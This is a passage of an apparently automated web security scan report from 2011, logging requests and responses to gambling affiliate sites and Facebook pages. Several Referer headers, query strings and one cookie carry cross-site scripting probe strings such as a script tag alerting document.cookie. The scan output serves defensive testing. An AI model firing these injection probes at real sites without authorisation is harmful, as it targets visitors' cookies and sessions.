<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif&quot;" onmouseout="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif&quot;" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.19. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /WebSite/Affiliates/login.aspx

Issue detail

The page was loaded from a URL containing a query string.
The response contains the following links to other domains:

Request

GET /WebSite/Affiliates/login.aspx?a034a\ HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?a034a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E761a7e15528=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:24:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 5493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...
</title><link id="lnkCss" type="text/css" rel="stylesheet" href="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/CSS/AffiliatesStyle.css" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...

18.20. https://www.aspireaffiliates.com/marketing-samples/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /marketing-samples/

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /marketing-samples/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif&quot;" onmouseout="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif&quot;" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.21. https://www.aspireaffiliates.com/mobile/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /mobile/

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /mobile/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.aspireaffiliates.com/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.aspireaffiliates.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNowOver.gif&quot;" onmouseout="this.src=&quot;https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif&quot;" src="https://download.neogames-tech.com/Companies/AspireGlobal/Affiliates/Website/Images/ApplyNow.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...
<div id="footban"><img src="https://download.neogames-tech.com/Resources/FlashBanners/20155/Banner.swf"></div>
...[SNIP]...

18.22. http://www.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:45 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/BigMoneyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
ards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/logo_ENG.jpg" border="0" alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" /></a>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<a id="ctl00_cphHeader_objPageHeader_lnkMobile" class="HeaderLinks" href="Mobile.aspx" style="white-space: nowrap">
<img border="0" align="absmiddle" hspace="0" vspace="0" alt="Mobile" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/mobile_icon.gif" />&nbsp;Mobile</a>
...[SNIP]...
<td class="HeaderMenuRightCell" align="right"><img src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/MenuCorner.jpg" border="0" alt="" style="vertical-align:top;" /></td>
...[SNIP]...
<area onclick="try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="Mobile.aspx" alt="Mobile" coords="50,3,66,28" target="_self"/>
<area onclick="try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="http://www.facebook.com/pages/BigMoneyScratch/156518521055171" alt="Facebook" coords="106,3,132,28" target="_blank"/>
<area onclick="try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="ContactUsTel.aspx" alt="Tel" coords="10,105,62,154" target="_self"/>
...[SNIP]...
<td class="HomePageContentRightCell">
<img width="184px" height="128" alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/Home/WinnersHeader_ENG_USD.jpg" />
<script type="text/javascript">
...[SNIP]...
</script>
<img width="184px" height="217" border="0" alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/Home/ContactUs_ENG.gif" usemap="#ContactUsMapping" />
       </td>
...[SNIP]...
<MAP NAME="footerMapping">
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="200,0,286,50" target="_blank" />
<area href="http://www.neogames.com/" alt="" coords="290,0,410,50" target="_blank" />
<area href="UnderAge.aspx" alt="" coords="414,0,450,50" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="" coords="454,0,545,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="" coords="554,0,620,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="" coords="625,0,780,50" target="_blank" />
</MAP>
...[SNIP]...
<td><img alt="Worlds most exciting, Scratchcards, Scratch Cards, Scratch off tickets, Flash Games, Play for free, Real Money Play, Amazing Promotions, New Player Bonus, Exclusive, VIP Rewards Club, Invite and Friend, Fun, Amazing Give always, BigMoneyScratch" border="0" src="http://download.neogames-tech.com/Brands/BigMoneyScratch/Website/General/bottom.gif" USEMAP="#footerMapping" /></td>
...[SNIP]...
2007). The Company's registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates BigMoneyScratch.com under a license issued and regulated by the
<a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" class="ContentLinks">
Lotteries and Gaming Authority
</a>
...[SNIP]...

18.23. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /?ref=ts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTSnNr7_aB426uwgNhTYi; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=9diln; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.104.41
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/WFXgtsTuqGq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yL/r/LnZ1HDCjD4N.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...
<span id="async_status" class="async_status" style="display: none"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="recaptcha_loading">Loading... <img class="captcha_loading img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" style="height:11px;width:16px;" /></div>
...[SNIP]...
<span id="captcha_async_status" class="async_status" style="display: none"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /></span>
...[SNIP]...
<div id="progress_wrap"><img class="img" src="http://f.static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" alt="" width="16" height="11" /><div id="progress_msg">
...[SNIP]...

18.24. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/40tZNLSoQrm.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/y8/r/WFXgtsTuqGq.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/2xUG0B1QtMs.css" />
<link type="text/css" rel="stylesheet" href="http://c.static.ak.fbcdn.net/rsrc.php/v1/yu/r/Cx2s6uhEG36.css" />

<script type="text/javascript" src="http://e.static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
<link rel="alternate" type="application/atom+xml" title="Winnings.com" href="feeds/page.php?id=127662903937630&amp;format=atom10"/>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://e.static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

18.25. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.254.27
X-Cnection: close
Date: Mon, 16 May 2011 12:49:45 GMT
Content-Length: 9862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/ZAHAqkTqkUj.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/RJF4f9OXUL1.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/metacafemovies" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41591_314888464487_7047_q.jpg" alt="Metacafe Movies" /></a>
...[SNIP]...

18.26. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=P0T0X; reg_ext_ref=http%3A%2F%2Fwww.primescratchcards.com%2Findex.asp%3Fcurr%3DUSD35af5%2527%253balert(document.location)%2F%2Fd13433ff10e%26g%3D3; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FPrimeScratchCards; wd=1137x805

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.55.55
X-Cnection: close
Date: Mon, 16 May 2011 12:52:08 GMT
Content-Length: 9885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/metacafemovies" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41591_314888464487_7047_q.jpg" alt="Metacafe Movies" /></a>
...[SNIP]...

18.27. http://www.incomate.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.incomate.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /?sa=games HTTP/1.1
Host: www.incomate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/html
Last-Modified: Tue, 10 May 2011 20:56:31 GMT
Accept-Ranges: bytes
ETag: "3fb2fbd54fcc1:0",""
Server: Microsoft-IIS/7.5
Date: Mon, 16 May 2011 12:33:51 GMT
Connection: close
Content-Length: 15841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<hea
...[SNIP]...
</a> -->
<a target="_blank" href="http://www.linkedin.com/company/790665"><img src="style/linkedin.jpg" alt="Go to Incomate LinkedIn profile"/>
...[SNIP]...
<div id="feed">
<script language="JavaScript" src="http://landmark-project.com/feed2js/feed2js.php?src=http%3A%2F%2Fwww.casinogamblingweb.com%2Fgambling.xml&amp;num=2&amp;desc=100&amp;targ=y&amp;utf=y" charset="UTF-8" type="text/javascript"></script>
...[SNIP]...
<i>Natalie, <a href='http://www.kasino.com/' target='_blank'>Kasino.com</a>
...[SNIP]...

18.28. http://www.info.crazyscratch.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /AboutUs.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /AboutUs.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
